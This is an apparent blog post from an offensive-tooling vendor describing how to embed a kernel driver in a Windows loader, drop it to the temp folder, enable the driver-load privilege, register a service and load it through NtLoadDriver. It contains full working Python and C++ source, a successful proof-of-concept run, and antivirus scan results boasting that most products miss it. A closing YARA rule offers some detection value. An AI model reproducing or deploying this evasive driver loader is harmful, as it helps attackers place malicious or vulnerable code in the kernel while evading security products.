Welcome to this new Medium post! Today I'll share a technique for loading kernel drivers (.sys files) without distributing them as separate files. While the driver still needs to be written to disk temporarily (Windows requires a physical file to load kernel drivers), we can embed the driver bytes directly into our loader executable as a byte array.
What This Technique Does
Instead of shipping your application with a separate .sys file that can be easily detected, analyzed, or blocked, we:
- Embed the driver as a byte array directly in the loader's source code
- Extract it at runtime to a temporary location
- Load the driver using the NtLoadDriver API
- Optionally clean up the temporary file after loading
Courses: Learn how real malware works on Windows OS from beginner to advanced taking our courses, all explained in C++.
Technique Database: Access 50+ real malware techniques with weekly updates, complete with code, PoCs, and AV scan results:
Malware Techniques Database
Explore an ever-growing collection of malware techniques
0x12darkdev.net
Modules: Dive deep into essential malware topics with our modular training program! Get a new module every 14 days. Start at just $1.99 per module, or unlock lifetime access to all modules for $100.
Introduction
This technique leverages Windows native driver loading mechanism while embedding the driver payload within the loader executable. Here's how it works:
- Payload Embedding: The .sys driver file is converted into a C++ byte array at compile time and linked directly into the executable. This eliminates the need to distribute separate driver files.
- Runtime Extraction: When executed, the loader writes the embedded bytes to a temporary location (typically
%TEMP%). Windows requires a physical file path to load kernel drivers, there's no way around this limitation. - Service Registration: The loader creates the necessary registry entries under HKLM\System
Code
We have two different projects, the first one it's a simple python code that's converting the .sys file in an array of bytes, the second one it's just loading this bytes array as a kernel service.
Python
# driver_to_array.py
import sys
def file_to_cpp_array(input_file, output_file, array_name):
with open(input_file, 'rb') as f:
data = f.read()
with open(output_file, 'w') as f:
f.write(f'// Auto-generated from {input_file}\n')
f.write(f'// Size: {len(data)} bytes\n\n')
f.write(f'unsigned char {array_name}[] = {{\n ')
for i, byte in enumerate(data):
if i > 0 and i % 16 == 0:
f.write('\n ')
f.write(f'0x{byte:02X}')
if i < len(data) - 1:
f.write(', ')
f.write('\n};\n\n')
f.write(f'unsigned int {array_name}_size = sizeof({array_name});\n')
print(f'[+] Generated {output_file}')
print(f'[+] Array name: {array_name}')
print(f'[+] Size: {len(data)} bytes')
if __name__ == '__main__':
if len(sys.argv) != 4:
print('Usage: python driver_to_array.py <input.sys> <output.h> <array_name>')
print('Example: python driver_to_array.py driver.sys driver_data.h g_DriverData')
sys.exit(1)
file_to_cpp_array(sys.argv[1], sys.argv[2], sys.argv[3])This script is a utility commonly used in systems programming and malware research. It takes a binary file (like a .sys driver or a .exe file) and converts it into a C++ header file containing the file's data as a byte array.
This allows you to embed a file directly into your program's source code so it can be dropped or loaded from memory at runtime without needing the original external file.
Reading the Source
The script opens the input_file in Binary Read mode ('rb').
- It reads every single byte of the file into memory
- Because it's in binary mode, it doesn't care if the file is a picture, a driver, or a text file; it just sees a sequence of numbers (0–255)
Generating the C++ Header
The script then creates the output_file and writes the C++ syntax needed to define an array:
- Header Comments: It adds the original filename and the total size for reference.
- The Array Declaration: It starts the line with
unsigned char array_name[] = {. - Hex Conversion: It loops through every byte and converts it into a hexadecimal string (e.g.,
0x4D) - Formatting: Every 16 bytes, it adds a new line (
\n) to keep the code readable - Size Variable: Finally, it creates an
unsigned intvariable to store the size of the array, making it easier to use in C++ later
C++ Code
#include <windows.h>
#include <winternl.h>
#include <iostream>
#include <string>
#include <psapi.h>
#include <shlwapi.h>
#pragma comment(lib, "psapi.lib")
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "shlwapi.lib")
#include "driver_data.h"
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_IMAGE_ALREADY_LOADED ((NTSTATUS)0xC000010E)
#define STATUS_OBJECT_NAME_NOT_FOUND ((NTSTATUS)0xC0000034L)
#define SE_LOAD_DRIVER_NAME TEXT("SeLoadDriverPrivilege")
typedef NTSTATUS(NTAPI* pNtLoadDriver)(PUNICODE_STRING DriverServiceName);
typedef NTSTATUS(NTAPI* pNtUnloadDriver)(PUNICODE_STRING DriverServiceName);
typedef VOID(NTAPI* pRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
std::string GetFileNameFromPath(const std::string& path) {
size_t lastSlash = path.find_last_of("\\/");
if (std::string::npos == lastSlash) return path;
return path.substr(lastSlash + 1);
}
std::wstring StringToWString(const std::string& str) {
int size = MultiByteToWideChar(CP_UTF8, 0, str.c_str(), -1, nullptr, 0);
std::wstring wstr(size, 0);
MultiByteToWideChar(CP_UTF8, 0, str.c_str(), -1, &wstr[0], size);
return wstr;
}
std::string GetTempDriverPath(const std::string& driverName) {
char tempPath[MAX_PATH];
GetTempPathA(MAX_PATH, tempPath);
return std::string(tempPath) + driverName + ".sys";
}
bool ExtractDriverToTemp(const std::string& outputPath) {
std::cout << "[*] Extracting embedded driver to: " << outputPath << std::endl;
HANDLE hFile = CreateFileA(
outputPath.c_str(),
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == INVALID_HANDLE_VALUE) {
std::cerr << "[-] Failed to create temp file. Error: " << GetLastError() << std::endl;
return false;
}
DWORD bytesWritten;
bool success = WriteFile(hFile, g_DriverData, g_DriverData_size, &bytesWritten, NULL);
CloseHandle(hFile);
if (!success || bytesWritten != g_DriverData_size) {
std::cerr << "[-] Failed to write driver data. Error: " << GetLastError() << std::endl;
return false;
}
std::cout << "[+] Driver extracted successfully (" << bytesWritten << " bytes)" << std::endl;
return true;
}
bool DeleteTempDriver(const std::string& driverPath) {
if (PathFileExistsA(driverPath.c_str())) {
if (DeleteFileA(driverPath.c_str())) {
std::cout << "[+] Temporary driver file deleted." << std::endl;
return true;
}
else {
std::cerr << "[-] Failed to delete temp driver. Error: " << GetLastError() << std::endl;
return false;
}
}
return true;
}
bool EnableLoadDriverPrivilege() {
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return false;
LUID luid;
if (!LookupPrivilegeValue(nullptr, SE_LOAD_DRIVER_NAME, &luid)) {
CloseHandle(hToken);
return false;
}
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bool res = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), nullptr, nullptr);
CloseHandle(hToken);
return res && (GetLastError() != ERROR_NOT_ALL_ASSIGNED);
}
bool IsDriverLoaded(const std::string& driverFileName) {
LPVOID drivers[1024];
DWORD cbNeeded;
if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) {
int numDrivers = cbNeeded / sizeof(drivers[0]);
for (int i = 0; i < numDrivers; i++) {
char name[MAX_PATH];
if (GetDeviceDriverBaseNameA(drivers[i], name, sizeof(name))) {
if (_stricmp(name, driverFileName.c_str()) == 0) {
return true;
}
}
}
}
return false;
}
void CleanupService(const std::string& driverName) {
// 1. First, try to unload the driver from kernel memory using NtUnloadDriver
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
auto NtUnload = (pNtUnloadDriver)GetProcAddress(hNtdll, "NtUnloadDriver");
auto RtlInit = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
if (NtUnload && RtlInit) {
std::wstring regPath = L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" + StringToWString(driverName);
UNICODE_STRING uStr;
RtlInit(&uStr, regPath.c_str());
NTSTATUS status = NtUnload(&uStr);
if (status == STATUS_SUCCESS) {
std::cout << "[*] Driver unloaded from kernel." << std::endl;
}
else if (status == STATUS_OBJECT_NAME_NOT_FOUND) {
std::cout << "[*] Driver was not in kernel memory." << std::endl;
}
else {
std::cout << "[*] NtUnloadDriver returned: 0x" << std::hex << status << std::dec << std::endl;
}
Sleep(300); // Give kernel time to unload
}
// 2. Try to stop and delete the service from SCM
SC_HANDLE scm = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (scm) {
SC_HANDLE svc = OpenServiceA(scm, driverName.c_str(), SERVICE_ALL_ACCESS);
if (svc) {
SERVICE_STATUS status;
ControlService(svc, SERVICE_CONTROL_STOP, &status);
DeleteService(svc);
CloseServiceHandle(svc);
std::cout << "[*] SCM service deleted." << std::endl;
}
CloseServiceHandle(scm);
}
// 3. Delete registry key
std::string regSubKey = "SYSTEM\\CurrentControlSet\\Services\\" + driverName;
if (RegDeleteTreeA(HKEY_LOCAL_MACHINE, regSubKey.c_str()) == ERROR_SUCCESS) {
std::cout << "[*] Registry key deleted." << std::endl;
}
Sleep(200); // Give the system time to process
}
bool UnloadDriverNT(const std::string& driverName) {
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
auto NtUnload = (pNtUnloadDriver)GetProcAddress(hNtdll, "NtUnloadDriver");
auto RtlInit = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
if (!NtUnload || !RtlInit) return false;
std::wstring regPath = L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" + StringToWString(driverName);
UNICODE_STRING uStr;
RtlInit(&uStr, regPath.c_str());
NTSTATUS status = NtUnload(&uStr);
if (status == STATUS_SUCCESS) {
std::cout << "[+] Driver unloaded successfully." << std::endl;
return true;
}
else if (status == STATUS_OBJECT_NAME_NOT_FOUND) {
std::cout << "[*] Driver was not loaded." << std::endl;
return true;
}
else {
std::cout << "[-] Error unloading driver: 0x" << std::hex << status << std::dec << std::endl;
return false;
}
}
bool SetupDriverService(const std::string& driverPath, const std::string& driverName) {
HKEY hKey;
std::string regSubKey = "SYSTEM\\CurrentControlSet\\Services\\" + driverName;
if (RegCreateKeyExA(HKEY_LOCAL_MACHINE, regSubKey.c_str(), 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hKey, NULL) != ERROR_SUCCESS) {
return false;
}
std::string ntPath = "\\??\\" + driverPath;
DWORD type = 1, start = 3, errorControl = 1;
RegSetValueExA(hKey, "Type", 0, REG_DWORD, (BYTE*)&type, 4);
RegSetValueExA(hKey, "Start", 0, REG_DWORD, (BYTE*)&start, 4);
RegSetValueExA(hKey, "ErrorControl", 0, REG_DWORD, (BYTE*)&errorControl, 4);
RegSetValueExA(hKey, "ImagePath", 0, REG_SZ, (BYTE*)ntPath.c_str(), (DWORD)ntPath.length() + 1);
RegCloseKey(hKey);
SC_HANDLE scm = OpenSCManagerA(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
if (scm) {
SC_HANDLE svc = CreateServiceA(scm, driverName.c_str(), driverName.c_str(), SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driverPath.c_str(), NULL, NULL, NULL, NULL, NULL);
if (svc) {
CloseServiceHandle(svc);
}
else if (GetLastError() == ERROR_SERVICE_EXISTS) {
std::cout << "[!] Service already exists in SCM (conflict)." << std::endl;
}
CloseServiceHandle(scm);
}
return true;
}
int main(int argc, char* argv[]) {
std::string driverName = "EmbeddedDriverService";
if (argc > 1) {
driverName = argv[1];
}
std::cout << "========================================" << std::endl;
std::cout << " Embedded Kernel Driver Loader" << std::endl;
std::cout << "========================================" << std::endl;
std::cout << "[*] Embedded driver size: " << g_DriverData_size << " bytes" << std::endl;
if (!EnableLoadDriverPrivilege()) {
std::cerr << "[-] Error: Administrator privileges required." << std::endl;
return 1;
}
// 1. Extract driver to temp location
std::string tempDriverPath = GetTempDriverPath(driverName);
std::string driverFile = GetFileNameFromPath(tempDriverPath);
if (!ExtractDriverToTemp(tempDriverPath)) {
std::cerr << "[-] Failed to extract driver." << std::endl;
return 1;
}
// 2. Check if already loaded
if (IsDriverLoaded(driverFile)) {
std::cout << "[!] WARNING: Driver is already in memory. Attempting to unload..." << std::endl;
if (!UnloadDriverNT(driverName)) {
std::cerr << "[-] Could not unload. Try manually: sc stop " << driverName << std::endl;
DeleteTempDriver(tempDriverPath);
return 1;
}
Sleep(500);
}
// 3. Complete cleanup
std::cout << "[*] Cleaning up previous remnants of: " << driverName << "..." << std::endl;
CleanupService(driverName);
// 4. Prepare Registry and SCM
if (!SetupDriverService(tempDriverPath, driverName)) {
std::cerr << "[-] Error configuring registry." << std::endl;
DeleteTempDriver(tempDriverPath);
return 1;
}
std::cout << "[+] Registry and SCM configured." << std::endl;
// 5. Load via Native API
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
auto NtLoad = (pNtLoadDriver)GetProcAddress(hNtdll, "NtLoadDriver");
auto RtlInit = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
if (!NtLoad || !RtlInit) {
std::cerr << "[-] Could not obtain ntdll.dll functions" << std::endl;
DeleteTempDriver(tempDriverPath);
return 1;
}
std::wstring regPath = L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" + StringToWString(driverName);
UNICODE_STRING uStr;
RtlInit(&uStr, regPath.c_str());
std::cout << "[*] Executing NtLoadDriver..." << std::endl;
NTSTATUS status = NtLoad(&uStr);
if (status == STATUS_SUCCESS) {
std::cout << "[+] STATUS_SUCCESS: Driver loaded successfully." << std::endl;
}
else if (status == STATUS_IMAGE_ALREADY_LOADED) {
std::cout << "[!] STATUS_IMAGE_ALREADY_LOADED: Driver was already in memory." << std::endl;
}
else {
std::cerr << "[-] NtLoadDriver error: 0x" << std::hex << status << std::dec << std::endl;
if (status == 0xC0000035) {
std::cerr << "[!] STATUS_OBJECT_NAME_COLLISION: Service/object name already exists." << std::endl;
std::cerr << "[!] Run manually: sc delete " << driverName << std::endl;
}
DeleteTempDriver(tempDriverPath);
return 1;
}
// 6. Final verification
Sleep(500);
if (IsDriverLoaded(driverFile)) {
std::cout << "[+] CONFIRMED: Driver active in kernel." << std::endl;
}
else {
std::cout << "[-] Driver does not appear in memory." << std::endl;
}
std::cout << "\n[*] Note: Temporary file remains at: " << tempDriverPath << std::endl;
std::cout << "[*] You can delete it after unloading the driver." << std::endl;
std::cout << "[OK] Use: sc query " << driverName << std::endl;
std::cout << "========================================" << std::endl;
// Optional: Delete temp file immediately (uncomment if desired)
// Note: The driver must remain on disk while loaded
// DeleteTempDriver(tempDriverPath);
return 0;
}This C++ code is a Kernel Driver Loader. It is the other half of the Python script we discussed earlier. While the Python script turns a driver into a byte array, this code takes that array, writes it back to a file, and forces the Windows kernel to load it into memory.
Here is the step-by-step breakdown of how it operates:
Preparation and Privileges
Before doing anything, the program needs permission to talk to the kernel.
EnableLoadDriverPrivilege: In Windows, loading a driver is a restricted action. This function looks up theSeLoadDriverPrivilege(usually held only by Administrators) and enables it for the current process.driver_data.h: It includes the file generated by your Python script, giving it access tog_DriverData(the raw bytes of the driver)
The Extraction Phase
Since the Windows Kernel cannot load a driver directly from a variable in memory (it must point to a file on disk), the program must drop the driver
GetTempDriverPath: Finds your system's temporary folder (e.g.,C:\Users\Name\AppData\Local\Temp)ExtractDriverToTemp: Uses the Windows APICreateFileAandWriteFileto save theg_DriverDatabyte array as a physical.sysfile on your hard drive
Environment Cleanup
To ensure a clean installation, the code tries to remove any old versions of the driver that might be lingering.
IsDriverLoaded: Checks the list of active kernel modules to see if the driver is already running.CleanupService: This is a "scorched earth" function. It tries to:
- Unload the driver from the kernel.
- Stop and delete the Windows Service (using the Service Control Manager)
- Delete the registry keys associated with the driver
Registering the Driver
Windows doesn't just run a driver; it treats it as a service.
SetupDriverService: This function manually creates the registry entries underHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\. It tells Windows where the file is located and how it should start
The Magic: Loading via Native API
Instead of using the standard high-level Windows commands, this code uses the Native API (ntdll.dll).
NtLoadDriver: This is a low-level function that tells the kernel to immediately map the driver into kernel space.- Why use Native API? It is often used by developers and malware researchers because it is more "direct" and can sometimes bypass security monitoring that watches higher-level functions like
StartService
Proof of Concept
We start running the python file:
python3 .\driverToArray.py C:\Users\s12de\Downloads\SRIO.sys driver_bytes.h g_DriverData
[+] Generated driver_bytes.h
[+] Array name: g_DriverData
[+] Size: 50216 bytesThen we copy the created file to the main C++, in the driver_data.h.
And then just execute the C++:
C:\Windows\System32>LoadKernelDriverNTInMemory.exe
========================================
Embedded Kernel Driver Loader
========================================
[*] Embedded driver size: 50216 bytes
[*] Extracting embedded driver to: C:\Users\s12de\AppData\Local\Temp\EmbeddedDriverService.sys
[+] Driver extracted successfully (50216 bytes)
[*] Cleaning up previous remnants of: EmbeddedDriverService...
[*] Driver was not in kernel memory.
[+] Registry and SCM configured.
[*] Executing NtLoadDriver...
[+] STATUS_SUCCESS: Driver loaded successfully.
[+] CONFIRMED: Driver active in kernel.
[*] Note: Temporary file remains at: C:\Users\s12de\AppData\Local\Temp\EmbeddedDriverService.sys
[*] You can delete it after unloading the driver.
[OK] Use: sc query EmbeddedDriverService
========================================
C:\Windows\System32>sc query EmbeddedDriverService
SERVICE_NAME: EmbeddedDriverService
TYPE : 1 KERNEL_DRIVER
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0Perfect!
Detection
Now it's time to see if the defenses are detecting this as a malicious threat
Kleenscan API
[*] Antivirus Scan Results:
- alyac | Status: pending | Flag: N/A | Updated: 2026-02-10
- amiti | Status: ok | Flag: Undetected | Updated: 2026-02-10
- arcabit | Status: ok | Flag: Undetected | Updated: 2026-02-10
- avast | Status: ok | Flag: Undetected | Updated: 2026-02-10
- avg | Status: ok | Flag: Undetected | Updated: 2026-02-10
- avira | Status: scanning | Flag: Scanning results incomplete | Updated: 2026-02-10
- bullguard | Status: ok | Flag: Undetected | Updated: 2026-02-10
- clamav | Status: ok | Flag: Undetected | Updated: 2026-02-10
- comodolinux | Status: ok | Flag: Undetected | Updated: 2026-02-10
- crowdstrike | Status: ok | Flag: Undetected | Updated: 2026-02-10
- drweb | Status: ok | Flag: Undetected | Updated: 2026-02-10
- emsisoft | Status: ok | Flag: Undetected | Updated: 2026-02-10
- escan | Status: ok | Flag: Undetected | Updated: 2026-02-10
- fprot | Status: ok | Flag: Undetected | Updated: 2026-02-10
- fsecure | Status: scanning | Flag: Scanning results incomplete | Updated: 2026-02-10
- gdata | Status: ok | Flag: Undetected | Updated: 2026-02-10
- ikarus | Status: ok | Flag: Trojan.Win64.Agent | Updated: 2026-02-10
- immunet | Status: ok | Flag: Undetected | Updated: 2026-02-10
- kaspersky | Status: ok | Flag: Undetected | Updated: 2026-02-10
- maxsecure | Status: ok | Flag: Undetected | Updated: 2026-02-10
- mcafee | Status: ok | Flag: Undetected | Updated: 2026-02-10
- microsoftdefender | Status: ok | Flag: Undetected | Updated: 2026-02-10
- nano | Status: ok | Flag: Undetected | Updated: 2026-02-10
- nod32 | Status: ok | Flag: Undetected | Updated: 2026-02-10
- norman | Status: ok | Flag: Undetected | Updated: 2026-02-10
- secureageapex | Status: ok | Flag: Malicious | Updated: 2026-02-10
- seqrite | Status: ok | Flag: Undetected | Updated: 2026-02-10
- sophos | Status: ok | Flag: Undetected | Updated: 2026-02-10
- threatdown | Status: ok | Flag: Undetected | Updated: 2026-02-10
- trendmicro | Status: ok | Flag: Undetected | Updated: 2026-02-10
- vba32 | Status: ok | Flag: Undetected | Updated: 2026-02-10
- virusfighter | Status: ok | Flag: Undetected | Updated: 2026-02-10
- xvirus | Status: ok | Flag: Undetected | Updated: 2026-02-10
- zillya | Status: ok | Flag: Undetected | Updated: 2026-02-10
- zonealarm | Status: ok | Flag: Undetected | Updated: 2026-02-10
- zoner | Status: ok | Flag: Undetected | Updated: 2026-02-10Litterbox
Static Analysis:
Dynamic Analysis:
ThreatCheck
Windows Defender
Undetected!
Elastic EDR
Detected
malware, intrusion_detection, process event with process LoadKernelDriverNTInMemory.exe, parent process cmd.exe, file LoadKernelDriverNTInMemory.exe, by s12de on s12 created high alert Malware Prevention Alert.Kaspersky Free AV
Undetected!
Bitdefender Free AV
Undetected!
YARA
Here a YARA rule to detect this technique:
rule Suspicious_Native_Kernel_Driver_Loader
{
meta:
author = "0x12 Dark Development"
description = "Detects userland binaries attempting to load kernel drivers using NtLoadDriver and related techniques"
date = "2026-02-11"
version = "1.0"
technique = "Userland Native API Driver Loading"
category = "Defense Evasion / Privilege Abuse"
reference = "Detection of embedded or dropped kernel driver loaders"
strings:
/* Native API usage */
$ntload = "NtLoadDriver" ascii wide
$ntunload = "NtUnloadDriver" ascii wide
$rtlinit = "RtlInitUnicodeString" ascii wide
/* Privilege manipulation */
$seload = "SeLoadDriverPrivilege" ascii wide
$adjusttok = "AdjustTokenPrivileges" ascii wide
$lookupluid = "LookupPrivilegeValue" ascii wide
/* Registry path for driver services */
$regpath1 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" ascii wide
$regpath2 = "SYSTEM\\CurrentControlSet\\Services\\" ascii wide
/* Service / SCM interaction */
$svc_kernel = "SERVICE_KERNEL_DRIVER" ascii wide
$createsvc = "CreateServiceA" ascii wide
$createsvcW = "CreateServiceW" ascii wide
$openscm = "OpenSCManager" ascii wide
/* Driver dropping behavior */
$createfile = "CreateFileA" ascii wide
$createfileW = "CreateFileW" ascii wide
$writefile = "WriteFile" ascii wide
$sys_ext = ".sys" ascii wide
condition:
uint16(0) == 0x5A4D and /* PE file */
(
/* Native API driver load + privilege manipulation */
(
$ntload and
$seload and
1 of ($adjusttok, $lookupluid)
)
or
/* Native API load + registry service manipulation */
(
$ntload and
1 of ($regpath*)
)
or
/* SCM kernel service creation + driver dropping */
(
1 of ($createsvc, $createsvcW) and
$svc_kernel and
$sys_ext
)
)
}Here you have my collection of YARA rules:
Conclusions
In conclusion, this technique demonstrates how kernel drivers can be embedded directly into a userland loader and deployed through Windows native mechanisms without distributing a standalone .sys file, reducing obvious artifacts while still complying with the operating system's requirement for a physical driver path. By combining payload embedding, temporary extraction, privilege adjustment, registry/service configuration, and direct Native API invocation via NtLoadDriver
📌 Follow me: YouTube | 🐦 X | 💬 Discord Server | 📸 Instagram | Newsletter
We help security teams enhance offensive capabilities with precision-built tooling and expert guidance, from custom malware to advanced evasion strategies
S12.